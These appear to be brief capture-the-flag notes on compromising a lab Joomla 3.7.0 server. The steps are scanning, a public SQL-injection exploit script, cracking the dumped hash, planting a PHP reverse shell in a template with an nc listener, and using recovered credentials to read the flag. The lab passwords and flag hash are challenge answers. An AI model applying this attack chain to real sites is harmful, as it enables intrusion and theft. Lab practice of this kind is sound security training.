-
Access the web server, who robbed the bank -spiderman
-
Joomla version -scan site for directories gobuster dir -u http://10.10.10.10 -w wordlist.txt result: /administrator, /README.txt -nmap scan nmap -sC -sV -A 10.10.10.10 http://10.10.10.10/language/en-GB/en-GB.xml -3.7.0
-
look for exploit for Joomla 3.7.0 -http://10.10.10.10/README.txt - 3.7.0 -use exploit db result: SQL Injection https://www.exploit-db.com/exploits/42033 exploit: https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py python3 joomblah.py result: hash for user ‘jonah’ hash.txt run: john hash.txt —wordlist=rockyou.txt result: spiderman123
-
http://10.10.10.10/administator user: jonah pass: spiderman123 php-reverse-shell: http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz (change Ip and port) open listener: nc -lvnp 1234 login in: Extensions > Templates > Templates > Beez3 > copy content to index.php go to: http://10.10.10.10/templates/beez3/index.php - get a reverse shell password saved in configuration file in /var/www/html su jjameson pass: nv5uz9r3ZEDzVjNu /home/user.txt 27a260fe3cba712cfdedb1c86d80442e
-
ssh jjameson@10.10.10.10 pass: nv5uz9r3ZEDzVjNu